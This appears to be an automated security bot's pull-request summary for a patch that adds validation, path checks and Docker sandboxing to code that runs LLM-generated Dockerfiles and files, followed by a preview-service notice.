Pensar - auto fix for Unvalidated LLM-Generated Code Execution in Docker Environment

[pensarapp]

Type	Identifier	Message	Severity	Link
Application	ML09	The run_locally function writes out and executes Dockerfiles and code files that are generated by an LLM. Since the LLM outputs are used directly without additional verification or sandboxing, malicious transformations in these outputs can lead to Docker build and container run steps executing unintended or harmful commands. This is particularly dangerous given the Docker-in-Docker setup, and falls under CWE ML09, where manipulated ML model outputs compromise system integrity.	high	Link

The original code had a critical security vulnerability (CWE ML09) where LLM-generated Dockerfiles and code files were being written to the filesystem and executed without validation or sandboxing. This could allow malicious code to run within Docker containers, potentially leading to privilege escalation, container breakout, or other security issues.

The patch implements several security measures:

1. Content Validation: Added two new validation functions:

   • validate_dockerfile(): Checks Dockerfiles for dangerous patterns like privileged mode, host network access, sensitive volume mounts, etc.
   • validate_file_content(): Analyzes code files for dangerous patterns like subprocess calls, eval(), system commands, etc.

2. Path Traversal Prevention: Added checks to ensure file paths don't attempt to escape the designated directory.

3. Docker Sandboxing: Enhanced Docker run command with security constraints:

   • Read-only filesystem
   • Network isolation
   • Memory and CPU limits
   • Capability restrictions
   • Privilege escalation prevention

4. Resource Protection: Added timeouts for both build and run operations to prevent resource exhaustion.

5. Unique Image Names: Used timestamp-based image names to prevent conflicts and container poisoning.

These changes mitigate the risk of executing malicious LLM-generated code while maintaining the original functionality. The patch adds the re module import which was not previously present, but this is a standard library module and doesn't introduce external dependencies.

[restack-app]

No applications have been configured for previews targeting branch: master. To do so go to restack console and configure your applications for previews.